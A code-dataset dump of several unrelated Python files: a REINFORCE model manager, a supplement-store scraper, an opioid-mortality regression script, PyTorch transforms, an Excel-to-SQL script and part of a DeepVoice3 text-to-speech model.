In[19]:\n\natlasdbcursor.close()\n\n\n# In[20]:\n\natlasdbconn.close()\n\n\n# In[ ]:\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202807762","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.\n\nimport logging\nfrom typing import Dict, Optional\n\nimport torch\nfrom reagent.core import types as rlt\nfrom reagent.core.dataclasses import dataclass, field\nfrom reagent.core.parameters import NormalizationData, NormalizationKey, param_hash\nfrom reagent.gym.policies.policy import Policy\nfrom reagent.gym.policies.predictor_policies import create_predictor_policy_from_model\nfrom reagent.gym.policies.samplers.discrete_sampler import SoftmaxActionSampler\nfrom reagent.model_managers.model_manager import ModelManager\nfrom reagent.models.model_feature_config_provider import RawModelFeatureConfigProvider\nfrom reagent.net_builder.discrete_dqn.dueling import Dueling\nfrom reagent.net_builder.unions import (\n DiscreteDQNNetBuilder__Union,\n ValueNetBuilder__Union,\n)\nfrom reagent.training import (\n ReAgentLightningModule,\n ReinforceTrainer,\n ReinforceTrainerParameters,\n)\nfrom reagent.workflow.types import ModelFeatureConfigProvider__Union, RewardOptions\n\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass Reinforce(ModelManager):\n __hash__ = param_hash\n\n trainer_param: ReinforceTrainerParameters = field(\n default_factory=ReinforceTrainerParameters\n )\n # using DQN net here because it supports `possible_actions_mask`\n policy_net_builder: DiscreteDQNNetBuilder__Union = field(\n # pyre-ignore\n default_factory=lambda: DiscreteDQNNetBuilder__Union(Dueling=Dueling())\n )\n value_net_builder: Optional[ValueNetBuilder__Union] = None\n state_feature_config_provider: ModelFeatureConfigProvider__Union = field(\n # pyre-ignore\n default_factory=lambda: ModelFeatureConfigProvider__Union(\n raw=RawModelFeatureConfigProvider(float_feature_infos=[])\n )\n )\n sampler_temperature: float = 1.0\n\n def __post_init_post_parse__(self):\n super().__post_init_post_parse__()\n self._policy: Optional[Policy] = None\n assert (\n len(self.action_names) > 1\n ), f\"REINFORCE needs at least 2 actions. Got {self.action_names}.\"\n\n @property\n def action_names(self):\n return self.trainer_param.actions\n\n def build_trainer(\n self,\n normalization_data_map: Dict[str, NormalizationData],\n use_gpu: bool,\n reward_options: Optional[RewardOptions] = None,\n ) -> ReinforceTrainer:\n policy_net_builder = self.policy_net_builder.value\n policy_network = policy_net_builder.build_q_network(\n self.state_feature_config,\n normalization_data_map[NormalizationKey.STATE],\n len(self.action_names),\n )\n value_net = None\n value_net_builder = self.value_net_builder\n if value_net_builder:\n value_net_builder = value_net_builder.value\n value_net = value_net_builder.build_value_network(\n normalization_data_map[NormalizationKey.STATE]\n )\n trainer = ReinforceTrainer(\n policy=self._create_policy(policy_network),\n value_net=value_net,\n **self.trainer_param.asdict(), # pyre-ignore\n )\n return trainer\n\n def create_policy(\n self,\n trainer_module: ReAgentLightningModule,\n serving: bool = False,\n normalization_data_map: Optional[Dict[str, NormalizationData]] = None,\n ):\n assert isinstance(trainer_module, ReinforceTrainer)\n if serving:\n assert normalization_data_map is not None\n return create_predictor_policy_from_model(\n self.build_serving_module(trainer_module, normalization_data_map)\n )\n else:\n return self._create_policy(trainer_module.scorer)\n\n def _create_policy(self, policy_network):\n if self._policy is None:\n sampler = SoftmaxActionSampler(temperature=self.sampler_temperature)\n self._policy = Policy(scorer=policy_network, sampler=sampler)\n return self._policy\n\n def build_serving_module(\n self,\n trainer_module: ReAgentLightningModule,\n normalization_data_map: Dict[str, NormalizationData],\n ) -> torch.nn.Module:\n assert isinstance(trainer_module, ReinforceTrainer)\n policy_serving_module = self.policy_net_builder.value.build_serving_module(\n q_network=trainer_module.scorer,\n state_normalization_data=normalization_data_map[NormalizationKey.STATE],\n action_names=self.action_names,\n state_feature_config=self.state_feature_config,\n )\n return policy_serving_module\n\n @property\n def state_feature_config(self) -> rlt.ModelFeatureConfig:\n return self.state_feature_config_provider.value.get_model_feature_config()\n","sub_path":"reagent/model_managers/policy_gradient/reinforce.py","file_name":"reinforce.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100046523","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nimport csv\nimport re\nimport time\n\n\noption = Options()\noption.add_argument(\"--incognito\")\n\ndriver = webdriver.Chrome(options=option)\n\nurl= \"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=1\"\ndriver.get(url)\n\n#Close pop up\nwait= WebDriverWait(driver, 15)\nwait.until(EC.frame_to_be_available_and_switch_to_it((By.NAME,\"ju_iframe_607875\")))\ndriver.find_element_by_xpath(\"//*[@id='justuno_form']/div/div[2]/div\").click()\ndriver.switch_to.default_content()\n\n\n\ncsv_file = open('plantbasedprotein.csv', 'w', encoding='utf-8', newline='')\nwriter = csv.writer(csv_file)\n\nurl_list = [\"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=1\", \"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=2\", \"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=3\"]\n\nwhile True:\n try:\n for url_ in url_list:\n driver.get(url_)\n\n # Open each product in new tab\n elems = [elem.get_attribute(\"href\") for elem in WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, \"//vshoppe-product-grid/div/div/div[2]/div/div[1]/div[1]/a\")))]\n windows_before = driver.current_window_handle\n\n for elem in elems:\n driver.execute_script(\"window.open('\" +elem +\"');\")\n WebDriverWait(driver, 10).until(EC.number_of_windows_to_be(2))\n\n windows_after = driver.window_handles\n new_window = [x for x in windows_after if x != windows_before][0] \n driver.switch_to.window(new_window) \n time.sleep(3)\n \n\n # Create empty dictionary to scrape product info\n product_dict={}\n\n try:\n name = driver.find_element_by_xpath('//*[@id=\"main-body-container\"]/div/div/div/div[1]/vshoppe-main-product-details-sco/div[2]/div/div/div[1]/vshoppe-product-details-upgrade/div/div/div[2]/h1').text\n except:\n name = None\n\n try:\n id_number = driver.find_element_by_xpath('//span[@class=\"item\"]').text\n except:\n id_number = None\n\n try:\n listed_price = driver.find_element_by_xpath('//span[@class=\"priceCurrencyLabel sale-price-displayed\"]/span[1]').text\n except:\n try:\n listed_price = driver.find_element_by_xpath('//span[@class=\"priceCurrencyLabel\"]/span[1]').text\n except:\n name = None\n\n try:\n price_per_serving = driver.find_element_by_xpath('//div[@class=\"pdp--priceServeRow\"]/span[1]').text\n except:\n price_per_serving = None\n\n try:\n brand = driver.find_element_by_xpath('//div[@class=\"productBrandName\"]/a[1]/span[1]').text\n except:\n brand = None \n\n try:\n ingredients = driver.find_element_by_xpath('//div[@class=\"product-label\"]/p[1]').text\n except:\n ingredients\n\n try:\n average_rating = driver.find_element_by_xpath(\"//span[@id='TTreviewSummaryAverageRating']\").text\n except:\n average_rating = None\n\n try: \n review_count = driver.find_element_by_xpath(\"//div[@class='TTreviewCount']\").text\n except:\n review_count = None\n\n try:\n recommend_yes = driver.find_element_by_xpath('//div[@class=\"TTreviewDimsSingleSelectSummary\"]/div[@class=\"TTreviewDimsSingleSelectValue\"][1]').text\n except:\n recommend_yes = None\n\n try:\n recommend_no = driver.find_element_by_xpath('//div[@class=\"TTreviewDimsSingleSelectSummary\"]/div[@class=\"TTreviewDimsSingleSelectValue\"][2]').text\n except:\n recommend_no = None\n\n try:\n speciality_diet = driver.find_element_by_xpath('//*[@id=\"link1\"]/div/div/div[1]/div[10]/div[2]/div[2]/p[1]').text\n except:\n speciality_diet = None\n\n try: \n form = driver.find_element_by_xpath('//*[@id=\"link1\"]/div/div/div[1]/div[2]/div[2]').text\n except: \n form = None\n\n try:\n calories = driver.find_element_by_xpath(\"//*[@id='link1']/div/div/div[2]/div[2]/table/tbody/tr[1]/td[2]/span\").text\n except:\n calories = None\n\n\n \n product_dict['name'] = name\n product_dict['id_number'] = id_number\n product_dict['listed_price'] = listed_price\n product_dict['price_per_serving'] = price_per_serving\n product_dict['brand'] = brand\n product_dict['ingredients'] = ingredients\n product_dict['average_rating'] = average_rating\n product_dict['review_count'] = review_count\n product_dict['recommend_yes'] = recommend_yes\n product_dict['recommend_no'] = recommend_no\n product_dict['speciality_diet'] = speciality_diet\n product_dict['form'] = form\n product_dict['calories'] = calories\n\n writer.writerow(product_dict.values())\n\n # Close the window\n driver.close()\n driver.switch_to.window(windows_before)\n\n except:\n try: \n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n except: \n csv_file.close()\n driver.close()\n break","sub_path":"vitaminshoppe/plantbased.py","file_name":"plantbased.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"107324093","text":"from sklearn import linear_model\nimport pandas as pd\nimport numpy as np\nimport glob\nfrom plotnine import *\nimport os\n\nos.chdir(\"/Users/N1/Op690/estimating-impact-of-opioid-prescription-regulations-team-3/00_source/\")\n\npolicy_change_year = 2012\nsearch = \"WA\"\n\n# combine data in all files\nappended_data = pd.DataFrame()\nfor filename in glob.glob('US_VitalStatistics/*.txt'):\n df_tmp = pd.read_csv(filename, sep='\\t')\n appended_data = appended_data.append(df_tmp)\n\nappended_data.head()\n\n\n# Save all mortality dataset to one file\n# FL_data.to_csv('US_Mortality_2003_2015.csv')\n\nsearch2 = \"Drug poisonings\"\nx = appended_data['County'].str.endswith(search, na=False)\nState_data = appended_data[x]\nY = State_data[\"Drug/Alcohol Induced Cause\"].str.startswith(search2, na=False)\nState_data = State_data[Y]\n\n# change datatypes\nState_data['Deaths'] = pd.to_numeric(State_data.Deaths)\nState_data['Year'] = State_data['Year'].astype('int')\n\n# expand county state to two columns\nState_data[['County', 'State']] = State_data['County'].str.split(', ', expand=True)\n\n\nState_deaths = State_data.groupby(['Year'], as_index=False)['Deaths'].sum()\n\nState_pop_year = pd.read_csv('Individual States/WA_Census_Data_State.csv')\n#State_pop_year = State_pop.groupby(['Year'], as_index=False)['Total_population'].sum()\n#State_pop_year.rename(columns ={'Total_population':'Population'},inplace = True)\n# missing pop data b4 2010, use linear regression and append results to state_year level pop dataset\nlr = linear_model.LinearRegression()\nlr.fit(X=State_pop_year['Year'].values.reshape(-1, 1),\n y=State_pop_year['Population'].values.reshape(-1, 1))\nX_pred = np.arange(2003, 2010).reshape(-1, 1)\ny_pred = lr.predict(X_pred)\ntmp = np.vstack([X_pred.flatten(), y_pred.flatten()]).T\ntmp_df = pd.DataFrame(tmp, columns=['Year', 'Population'])\nState_pop_year2 = State_pop_year.copy()\nState_pop_year2 = State_pop_year2.append(tmp_df).sort_values(by='Year').astype('int64')\n\n# merge stata-year level pop and mortality dataset\nmerged_death_pop = pd.merge(State_deaths, State_pop_year2, on=['Year'], how='left')\n\n# Calc relative Mortiality per cap\nmerged_death_pop['Deaths_per_Pop'] = merged_death_pop['Deaths'] / \\\n merged_death_pop['Population'] * 100000\n\n# fit LinearRegression for mortlaity prediction after policy changers\n\nyears_from_2003 = policy_change_year - 2003\nlr2 = linear_model.LinearRegression()\nlr2.fit(X=merged_death_pop['Year'][:years_from_2003].values.reshape(-1, 1),\n y=merged_death_pop['Deaths_per_Pop'][:years_from_2003].values.reshape(-1, 1))\nmerged_death_pop['Pred_Deaths_per_Pop'] = lr2.predict(\n merged_death_pop['Year'].values.reshape(-1, 1)).flatten().T\n\n# Write file to csv\nmerged_death_pop.to_csv(\n \"/Users/N1/Op690/estimating-impact-of-opioid-prescription-regulations-team-3/20_intermediate_files/50_Washington_Prepost.csv\")\n\n# Washington plot\npolicy_change_year = 2012\n\nWA_PLOT = (ggplot(Washington, aes(x='Year', y='Deaths_per_Pop')) +\n geom_smooth(Washington.loc[Washington['Year'] >= policy_change_year], aes(x='Year', y='Pred_Deaths_per_Pop'), method='lm', level=0.95, color=\"red\") +\n geom_smooth(Washington.loc[Washington['Year'] >= policy_change_year], aes(x='Year', y='Deaths_per_Pop'), method='lm', level=0.95, color=\"blue\") +\n geom_smooth(Washington.loc[Washington['Year'] <= (policy_change_year-1)], aes(x='Year', y='Deaths_per_Pop'), method='lm', level=0.95, color=\"black\") +\n geom_vline(xintercept=policy_change_year, colour=\"#BB0000\") +\n ggtitle('Washington Mortality: Pre-Post Analysis') +\n xlim(2002, 2015) +\n ylab('Deaths per Capita (100k)')\n )\n\n\n(ggsave(p, width=10, height=10))\n","sub_path":"10_code/WA_Prepost_Analysis.py","file_name":"WA_Prepost_Analysis.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"457151793","text":"import numpy as np\r\nimport pandas as pd\r\nimport torch\r\n\r\n\r\nclass Normalise(object):\r\n \"\"\"\r\n Normalise features in sample according to given mean and std.\r\n Args:\r\n mean (pandas DataFrame).\r\n std (pandas DataFrame).\r\n \"\"\"\r\n def __init__(self, mean, std):\r\n self.mean = mean\r\n self.std = std\r\n \r\n # Find columns that dont contain \"auto\" values in mean and std\r\n self.cols_mean = mean.loc[:, mean.loc[0, :]!=\"auto\"].columns\r\n self.cols_std = std.loc[:, std.loc[0, :]!=\"auto\"].columns\r\n # Also find indices of these columns\r\n self.cols_mean_i = [self.mean.columns.get_loc(col) for col in self.cols_mean]\r\n self.cols_std_i = [self.std.columns.get_loc(col) for col in self.cols_std]\r\n \r\n # Convert dataframes to Series\r\n self.mean = self.mean.iloc[0, :]\r\n self.std = self.std.iloc[0, :]\r\n\r\n\r\n def __call__(self, datapoint):\r\n sample = datapoint[\"sample\"]\r\n target = datapoint[\"target\"]\r\n\r\n # Reorder columns in stats to match order of sample\r\n # Will throw an error if stats dont contain all the headers in sample\r\n #self.mean = self.mean[sample.columns]\r\n #self.std = self.std[sample.columns]\r\n\r\n # Calculate current mean and std of the sample\r\n automean = np.mean(sample.values, axis=0)\r\n autostd = np.mean(sample.values, axis=0)\r\n \r\n # Replace values that dont correspond to \"auto\" with values from self stats\r\n automean[self.cols_mean_i] = self.mean[self.cols_mean]\r\n autostd[self.cols_std_i] = self.std[self.cols_std]\r\n\r\n # Apply normalisation to sample\r\n sample = (sample - automean) / autostd\r\n\r\n datapoint = {\"sample\": sample, \"target\": target}\r\n return datapoint\r\n \r\n\r\nclass SelectFeatures(object):\r\n \"\"\"\r\n Choose which features to keep in sample and target (pandas dataframes).\r\n Args:\r\n input_features (sequence): list of input features to keep.\r\n output_features (sequence): list of output features to keep.\r\n \"\"\"\r\n def __init__(self, input_features, output_features):\r\n self.input_features = input_features\r\n self.output_features = output_features\r\n\r\n def __call__(self, datapoint):\r\n sample = datapoint[\"sample\"]\r\n target = datapoint[\"target\"]\r\n\r\n sample = sample[self.input_features]\r\n target = target[self.output_features]\r\n\r\n datapoint = {\"sample\": sample, \"target\": target}\r\n return datapoint\r\n\r\n\r\nclass ToTensor(object):\r\n \"\"\"\r\n Convert both sample and target (pandas dataframes) to pytorch tensors.\r\n \"\"\"\r\n def __call__(self, datapoint):\r\n sample = datapoint[\"sample\"].to_numpy()\r\n target = datapoint[\"target\"].to_numpy()\r\n sample = torch.Tensor(sample).transpose(-1, -2) # Transpose to BCL format\r\n target = torch.Tensor(target).transpose(-1, -2)\r\n \r\n datapoint = {\"sample\": sample, \"target\": target}\r\n return datapoint","sub_path":"transforms/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"530957856","text":"#TIAGO BORGES NASCIMENTO\nimport xlrd\n\n#apontar para o caminho do .xls\ncaminho= \"C:/Users/Root GOD/Desktop/Query Automatic/POSQL.xlsx\"\n\nexcel = xlrd.open_workbook(caminho)\nplan1 = excel.sheet_by_index(0)\n\n#print(plan1.cell_value(rowx=14, colx = 0)) ->printa o valor da celula\n\nstatus = (\"check\", \"submited\")\ncheck = []\nsubmited = []\ncolunas = [0, 1]\n\n\n#EXTRAI OS DADOS DO EXCEL \nfor celula in range(plan1.nrows):\n value = (int(plan1.cell_value(rowx = celula, colx = colunas[0]))), (str(plan1.cell_value(rowx = celula, colx = colunas[1]))) \n if value[1] in status[0]:\n check.append(value[0])\n if value[1] in status[1]:\n submited.append(value[0])\n\n#verifica a consistência dos dados\nprint(\"STATUS CHECK = \", check)\nprint(\"--------------------------------------------\")\nprint(\"STATUS SUBMITED = \", submited)\n#-----\nprint(\"--------------------------------------------\")\n\n#monta a query do SQL\nsql = \"UPDATE nome_tabela\\nSET \"\nsql2 = \"\"\nfor PO in check:\n sql2 += str(PO) +\"field = 'x', \"\nsql3 = \"\\nWHERE = condition\"\n\nsql = sql + sql2 + sql3\nprint(\"\"+ sql)\n#finaliza a query","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"309743713","text":"# coding: utf-8\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.autograd import Variable\nimport math\nimport numpy as np\n\nfrom fairseq.models.fconv import Embedding, Linear, LinearizedConvolution\nfrom fairseq.modules import GradMultiply\nfrom fairseq.modules.conv_tbc import ConvTBC as _ConvTBC\n\n\ndef Conv1d(in_channels, out_channels, kernel_size, dropout=0, **kwargs):\n from .conv import Conv1d\n m = Conv1d(in_channels, out_channels, kernel_size, **kwargs)\n std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))\n m.weight.data.normal_(mean=0, std=std)\n m.bias.data.zero_()\n return nn.utils.weight_norm(m)\n\n\ndef LinearizedConv1d(in_channels, out_channels, kernel_size, dilation=(1,), dropout=0, **kwargs):\n \"\"\"Weight-normalized Conv1d layer optimized for decoding\"\"\"\n assert dilation[0] == 1\n m = LinearizedConvolution(in_channels, out_channels, kernel_size, **kwargs)\n std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))\n m.weight.data.normal_(mean=0, std=std)\n m.bias.data.zero_()\n return nn.utils.weight_norm(m)\n\n\ndef ConvTBC(in_channels, out_channels, kernel_size, dilation=(1,), dropout=0, **kwargs):\n \"\"\"Weight-normalized Conv1d layer\"\"\"\n from fairseq.modules import ConvTBC\n assert dilation[0] == 1\n m = ConvTBC(in_channels, out_channels, kernel_size, **kwargs)\n std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))\n m.weight.data.normal_(mean=0, std=std)\n m.bias.data.zero_()\n return nn.utils.weight_norm(m, dim=2)\n\n\ndef has_dilation(convolutions):\n return np.any(np.array(list(map(lambda x: x[2], convolutions))) > 1)\n\n\ndef build_deepvoice3(n_vocab, embed_dim=256, mel_dim=80, linear_dim=4096, r=5,\n n_speakers=1, speaker_embed_dim=16, padding_idx=None,\n dropout=(1 - 0.95), kernel_size=5,\n encoder_channels=128,\n decoder_channels=256,\n converter_channels=256,\n query_position_rate=1.0,\n key_position_rate=1.29,\n use_memory_mask=False,\n trainable_positional_encodings=False,\n ):\n h = encoder_channels # hidden dim (channels)\n k = kernel_size # kernel size\n encoder = Encoder(\n n_vocab, embed_dim, padding_idx=padding_idx,\n n_speakers=n_speakers, speaker_embed_dim=speaker_embed_dim,\n dropout=dropout,\n # (channels, kernel_size, dilation)\n convolutions=[(h, k, 1), (h, k, 1), (h, k, 1), (h, k, 1),\n (h, k, 2), (h, k, 4), (h, k, 8)],\n )\n\n h = decoder_channels\n decoder = Decoder(\n embed_dim, in_dim=mel_dim, r=r, padding_idx=padding_idx,\n n_speakers=n_speakers, speaker_embed_dim=speaker_embed_dim,\n dropout=dropout,\n convolutions=[(h, k, 1), (h, k, 1), (h, k, 2), (h, k, 4), (h, k, 8)],\n attention=[True, False, False, False, True],\n force_monotonic_attention=[True, False, False, False, True],\n query_position_rate=query_position_rate,\n key_position_rate=key_position_rate,\n use_memory_mask=use_memory_mask)\n\n in_dim = h // r\n h = converter_channels\n converter = Converter(\n in_dim=in_dim, out_dim=linear_dim, dropout=dropout,\n convolutions=[(h, k, 1), (h, k, 1), (h, k, 2), (h, k, 4), (h, k, 8)])\n\n model = DeepVoice3(\n encoder, decoder, converter, padding_idx=padding_idx,\n mel_dim=mel_dim, linear_dim=linear_dim,\n n_speakers=n_speakers, speaker_embed_dim=speaker_embed_dim,\n trainable_positional_encodings=trainable_positional_encodings)\n\n return model\n\n\nclass DeepVoice3(nn.Module):\n def __init__(self, encoder, decoder, converter,\n mel_dim=80, linear_dim=4096,\n n_speakers=1, speaker_embed_dim=16, padding_idx=None,\n trainable_positional_encodings=False):\n super(DeepVoice3, self).__init__()\n self.mel_dim = mel_dim\n self.linear_dim = linear_dim\n self.trainable_positional_encodings = trainable_positional_encodings\n\n self.encoder = encoder\n self.decoder = decoder\n self.converter = converter\n self.encoder.num_attention_layers = sum(\n [layer is not None for layer in decoder.attention])\n\n # Speaker embedding\n if n_speakers > 1:\n self.embed_speakers = Embedding(\n n_speakers, speaker_embed_dim, padding_idx)\n self.n_speakers = n_speakers\n self.speaker_embed_dim = speaker_embed_dim\n\n self.use_text_pos_embedding_in_encoder = False\n\n def get_trainable_parameters(self):\n if self.trainable_positional_encodings:\n return self.parameters()\n\n # Avoid updating the position encoding\n pe_query_param_ids = set(map(id, self.decoder.embed_query_positions.parameters()))\n pe_keys_param_ids = set(map(id, self.decoder.embed_keys_positions.parameters()))\n freezed_param_ids = pe_query_param_ids | pe_keys_param_ids\n return (p for p in self.parameters() if id(p) not in freezed_param_ids)\n\n def forward(self, text_sequences, mel_targets=None, speaker_ids=None,\n text_positions=None, frame_positions=None, input_lengths=None):\n B = text_sequences.size(0)\n\n if speaker_ids is not None:\n speaker_embed = self.embed_speakers(speaker_ids)\n else:\n speaker_embed = None\n\n # (B, T, text_embed_dim)\n if self.use_text_pos_embedding_in_encoder:\n encoder_outputs = self.encoder(\n text_sequences, text_positions=text_positions,\n lengths=input_lengths, speaker_embed=speaker_embed)\n else:\n encoder_outputs = self.encoder(\n text_sequences, lengths=input_lengths, speaker_embed=speaker_embed)\n\n # (B, T', mel_dim*r)\n mel_outputs, alignments, done, decoder_states = self.decoder(\n encoder_outputs, mel_targets,\n text_positions=text_positions, frame_positions=frame_positions,\n speaker_embed=speaker_embed, lengths=input_lengths)\n\n # Reshape\n # (B, T, mel_dim)\n mel_outputs = mel_outputs.view(B, -1, self.mel_dim)\n decoder_states = decoder_states.view(B, mel_outputs.size(1), -1)\n\n # (B, T, linear_dim)\n linear_outputs = self.converter(decoder_states)\n\n return mel_outputs, linear_outputs, alignments, done\n\n def make_generation_fast_(self):\n\n def remove_weight_norm(m):\n try:\n nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n self.apply(remove_weight_norm)\n\n\nclass Encoder(nn.Module):\n def __init__(self, n_vocab, embed_dim, n_speakers, speaker_embed_dim,\n padding_idx=None, convolutions=((64, 5, .1),) * 7,\n max_positions=512, dropout=0.1):\n super(Encoder, self).__init__()\n self.dropout = dropout\n self.num_attention_layers = None\n\n # Text input embeddings\n self.embed_tokens = Embedding(n_vocab, embed_dim, padding_idx)\n\n # Text position embedding\n self.embed_text_positions = Embedding(\n max_positions, embed_dim, padding_idx)\n self.embed_text_positions.weight.data = position_encoding_init(\n max_positions, embed_dim)\n\n # Speaker embedding\n if n_speakers > 1:\n self.speaker_fc1 = Linear(speaker_embed_dim, embed_dim)\n self.speaker_fc2 = Linear(speaker_embed_dim, embed_dim)\n self.n_speakers = n_speakers\n\n # Non-causual convolutions\n in_channels = convolutions[0][0]\n self.fc1 = Linear(embed_dim, in_channels, dropout=dropout)\n self.projections = nn.ModuleList()\n self.speaker_projections = nn.ModuleList()\n self.convolutions = nn.ModuleList()\n\n Conv1dLayer = Conv1d if has_dilation(convolutions) else ConvTBC\n\n for (out_channels, kernel_size, dilation) in convolutions:\n pad = (kernel_size - 1) // 2 * dilation\n dilation = (dilation,)\n self.projections.append(Linear(in_channels, out_channels)\n if in_channels != out_channels else None)\n self.speaker_projections.append(\n Linear(speaker_embed_dim, out_channels) if n_speakers > 1 else None)\n self.convolutions.append(\n Conv1dLayer(in_channels, out_channels * 2, kernel_size, padding=pad,\n dilation=dilation, dropout=dropout))\n in_channels = out_channels\n self.fc2 = Linear(in_channels, embed_dim)\n\n def forward(self, text_sequences, text_positions=None, lengths=None,\n speaker_embed=None):\n assert self.n_speakers == 1 or speaker_embed is not None\n\n # embed text_sequences\n x = self.embed_tokens(text_sequences)\n if text_positions is not None:\n x += self.embed_text_positions(text_positions)\n\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n # embed speakers\n if speaker_embed is not None:\n # expand speaker embedding for all time steps\n # (B, N) -> (B, T, N)\n ss = speaker_embed.size()\n speaker_embed = speaker_embed.unsqueeze(1).expand(\n ss[0], x.size(1), ss[-1])\n speaker_embed_btc = speaker_embed\n speaker_embed_tbc = speaker_embed.transpose(0, 1)\n x += F.softsign(self.speaker_fc1(speaker_embed_btc))\n\n input_embedding = x\n\n # project to size of convolution\n x = self.fc1(x)\n\n use_convtbc = isinstance(self.convolutions[0], _ConvTBC)\n # TBC case: B x T x C -> T x B x C\n # Generic case: B x T x C -> B x C x T\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # 1D conv blocks\n for proj, speaker_proj, conv in zip(\n self.projections, self.speaker_projections, self.convolutions):\n residual = x if proj is None else proj(x)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv(x)\n splitdim = -1 if use_convtbc else 1\n a, b = x.split(x.size(splitdim) // 2, dim=splitdim)\n if speaker_proj is not None:\n softsign = F.softsign(speaker_proj(\n speaker_embed_tbc if use_convtbc else speaker_embed_btc))\n softsign = softsign if use_convtbc else softsign.transpose(1, 2)\n a = a + softsign\n x = a * F.sigmoid(b)\n x = (x + residual) * math.sqrt(0.5)\n\n # Back to batch first\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # project back to size of embedding\n keys = self.fc2(x)\n if speaker_embed is not None:\n keys += F.softsign(self.speaker_fc2(speaker_embed_btc))\n\n # scale gradients (this only affects backward, not forward)\n if self.num_attention_layers is not None:\n keys = GradMultiply.apply(keys, 1.0 / (2.0 * self.num_attention_layers))\n\n # add output to input embedding for attention\n values = (keys + input_embedding) * math.sqrt(0.5)\n\n return keys, values\n\n\ndef get_mask_from_lengths(memory, memory_lengths):\n \"\"\"Get mask tensor from list of length\n Args:\n memory: (batch, max_time, dim)\n memory_lengths: array like\n \"\"\"\n mask = memory.data.new(memory.size(0), memory.size(1)).byte().zero_()\n for idx, l in enumerate(memory_lengths):\n mask[idx][:l] = 1\n return ~mask\n\n\nclass AttentionLayer(nn.Module):\n def __init__(self, conv_channels, embed_dim, dropout=0.1):\n super(AttentionLayer, self).__init__()\n # projects from output of convolution to embedding dimension\n self.in_projection = Linear(conv_channels, embed_dim)\n # projects from embedding dimension to convolution size\n self.out_projection = Linear(embed_dim, conv_channels)\n self.dropout = dropout\n\n def forward(self, query, encoder_out, mask=None, last_attended=None,\n window_size=3):\n keys, values = encoder_out\n residual = query\n\n # attention\n x = self.in_projection(query)\n x = torch.bmm(x, keys)\n\n mask_value = -float(\"inf\")\n if mask is not None:\n mask = mask.view(query.size(0), 1, -1)\n x.data.masked_fill_(mask, mask_value)\n\n if last_attended is not None:\n if last_attended > 0:\n x[:, :, :last_attended] = mask_value\n ahead = last_attended + window_size\n if ahead < x.size(-1):\n x[:, :, ahead:] = mask_value\n\n # softmax over last dim\n # (B, tgt_len, src_len)\n sz = x.size()\n x = F.softmax(x.view(sz[0] * sz[1], sz[2]), dim=1)\n x = x.view(sz)\n attn_scores = x\n\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n x = torch.bmm(x, values)\n\n # scale attention output\n s = values.size(1)\n x = x * (s * math.sqrt(1.0 / s))\n\n # project back\n x = (self.out_projection(x) + residual) * math.sqrt(0.5)\n return x, attn_scores\n\n\ndef position_encoding_init(n_position, d_pos_vec, position_rate=1.0):\n ''' Init the sinusoid position encoding table '''\n\n # keep dim 0 for padding token position encoding zero vector\n position_enc = np.array([\n [position_rate * pos / np.power(10000, 2 * i / d_pos_vec) for i in range(d_pos_vec)]\n if pos != 0 else np.zeros(d_pos_vec) for pos in range(n_position)])\n\n position_enc[1:, 0::2] = np.sin(position_enc[1:, 0::2]) # dim 2i\n position_enc[1:, 1::2] = np.cos(position_enc[1:, 1::2]) # dim 2i+1\n return torch.from_numpy(position_enc).type(torch.FloatTensor)\n\n\nclass Decoder(nn.Module):\n def __init__(self, embed_dim, n_speakers, speaker_embed_dim,\n in_dim=80, r=5,\n max_positions=512, padding_idx=None,\n convolutions=((128, 5, 1),) * 4,\n attention=True, dropout=0.1,\n use_memory_mask=False,\n force_monotonic_attention=True,\n query_position_rate=1.0,\n key_position_rate=1.29,\n ):\n super(Decoder, self).__init__()\n self.dropout = dropout\n self.in_dim = in_dim\n self.r = r\n\n in_channels = in_dim * r\n if isinstance(attention, bool):\n # expand True into [True, True, ...] and do the same with False\n attention = [attention] * len(convolutions)\n\n # Position encodings for query (decoder states) and keys (encoder states)\n self.embed_query_positions = Embedding(\n max_positions, convolutions[0][0], padding_idx)\n self.embed_query_positions.weight.data = position_encoding_init(\n max_positions, convolutions[0][0], position_rate=query_position_rate)\n self.embed_keys_positions = Embedding(\n max_positions, embed_dim, padding_idx)\n self.embed_keys_positions.weight.data = 